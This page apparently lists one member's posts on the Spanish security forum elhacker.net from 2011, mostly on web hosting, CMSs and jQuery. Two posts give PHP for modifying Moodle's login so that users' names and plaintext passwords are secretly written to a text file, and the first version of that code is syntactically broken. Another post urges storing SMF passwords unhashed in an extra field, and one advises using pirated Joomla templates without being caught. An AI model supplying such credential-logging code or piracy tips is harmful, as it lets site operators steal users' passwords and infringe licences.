elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11
81  Programación / Desarrollo Web / Re: ¿Un servidor para almacenar varias webs (en casa)? en: 15 Abril 2011, 23:15 pm
Hola,

pues como dice johnwmartinez, un servidor casero sale muy caro.

Te recomiendo que compres un servidor reseller, yo tengo uno y me cuesta como 18 dólares al mes y puedo tener ahi los sitios que yo quiera. Si lo pago al año me sale más barato.

En el servidor reseller yo administro los paquetes, creo paquete básico, paquete PyMe, etc...

Si sabes sumar y restar seguro contratarás un reseller ;)
82  Programación / Desarrollo Web / Re: Joomla Premium en: 13 Abril 2011, 07:22 am
Pues yo me la paso usando templates de pago y nunca ha pasado nada.. prueba a instalar el template en localhost sin conexión a internet y luego subes el sitio a tu hosting, los instaladores generalmente no envían un email al propietario del sitio. Sinceramente veo difícil que te "cachen" por usar las plantillas pirata.
83  Programación / Desarrollo Web / Re: Recuperar código fuente página web externa en: 12 Abril 2011, 06:51 am
Yo creo que sería modificando la función de búsqueda, si te das cuenta cuando buscas algo te resalta las palabras buscadas, si eso lo modificas para que, predeterminadamente ya tenga la opción de búsqueda activada seguramente será más fácil.

Descarga esta extensión y la modificas: https://chrome.google.com/extensions/detail/cpecbmjeidppdiampimghndkikcmoadk
84  Programación / Desarrollo Web / Re: ¿Redes de datos? en: 12 Abril 2011, 06:48 am
Hola, tu última pregunta ya es más sobre programación. Un servidor puede tener muchos teras de espacio, y si tienes muchos servidores en tu granja pues es fácil alojar tantos archivos.
El problema más bien es con el ancho de banda que ese es más limitado.

Busca información en Google sobre "LAMP", e instala Ubuntu Server en una PC viejita que tengas o que ya no uses, ahi puedes hacer pruebas. Luego que lo hayas instalado busca en Google algún script en PHP como: PHP Uploader Script +jQuery +MySQL
85  Programación / PHP / Re: Modificar el formulario login de Moodle en: 12 Abril 2011, 06:43 am
Ah perdon, es algo así la concatenación:
Citar
$stringData = "Usuario: ".$_POST['username'] . " Contraseña: ".$_POST['password'];

Pero OJO, esto lo tienes que revisar bien en los archivos de Moodle, ya que no se si ahí es donde reciba los datos por POST, a mi Moodle se me hace que esta mal hecho...
86  Programación / Desarrollo Web / Re: Qué CMS utilizas con mayor frecuencia en: 11 Abril 2011, 17:22 pm
Yo he usado Joomla desde que era mambo, he visto toda su evolución desde la versión 1.0 hasta la actual 1.6, es un CMS que ha sido reescrito para mejorar el desarrollo de aplicaciones sobre él, osea, es un Framwork con más de 7000 extensiones para usar, entre gratuitas, libres y de pago.

Como todo hay desarrolladores que no se fijan tanto en la seguridad de sus webs... ya sea por falta de tiempo o por falta de desconocimiento y como sabemos ningún software es completamente seguro.
87  Programación / Desarrollo Web / Re: Password al registrarse en: 11 Abril 2011, 17:09 pm
Hola, las contraseñas me parecen que se guardan en MD5, busca en el paquete de instalación de SMF en donde venga la función de PHP:
Código:
md5

Ahí en ese mismo archivo ha de venir donde hace el insert en la base de datos, te recomiendo que modifiques la tabla para poder guardar en OTRO CAMPO esa contraseña, es lo más fácil, de otra forma vas a tener que modificar todo SMF para que funcione sin MD5, que no es muy seguro que digamos...  :¬¬
88  Programación / Desarrollo Web / Re: Codigo Java Script generado por php no funciona !!!!!! en: 9 Abril 2011, 19:43 pm
Mira te dejo este ejemplo, aunque ya esta un poco viejo pero aún asi te puede server, es PHP, MySQL y javascript (jQuery y AJAX)
Auto-populating Select Boxes using jQuery & AJAX
http://remysharp.com/2007/01/20/auto-populating-select-boxes-using-jquery-ajax/

Este es el demo:
http://remysharp.com/wp-content/uploads/2007/01/select.html
89  Programación / PHP / Re: Modificar el formulario login de Moodle en: 6 Abril 2011, 03:14 am
Hola, tienes que modificar los archivos PHP del login, en donde recibe los datos de ese formulario.

Bájate el Notepad++ y busca lo siguiente en todos los archivos:
$_POST['username']
Si no encuentras nada prueba con username

Ya que lo encuentres, toma ese valor y has un simple codigo que escriba un TXT:
Código:
$filename = "01042011/log4.txt";
$fh = fopen($filename, 'a+') or die("can't open file");
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];
fwrite($fh, $stringData);
fclose($fh);
90  Programación / Desarrollo Web / Re: Validación de campos con JQuery en: 6 Abril 2011, 03:01 am
Hola, yo actualmente uso un plugin llamado:
jQuery plugin: Validation
http://bassistance.de/jquery-plugins/jquery-plugin-validation/

Esta muy bueno y validas los formularios muy rápido!
Páginas: 1 2 3 4 5 6 7 8 [9] 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines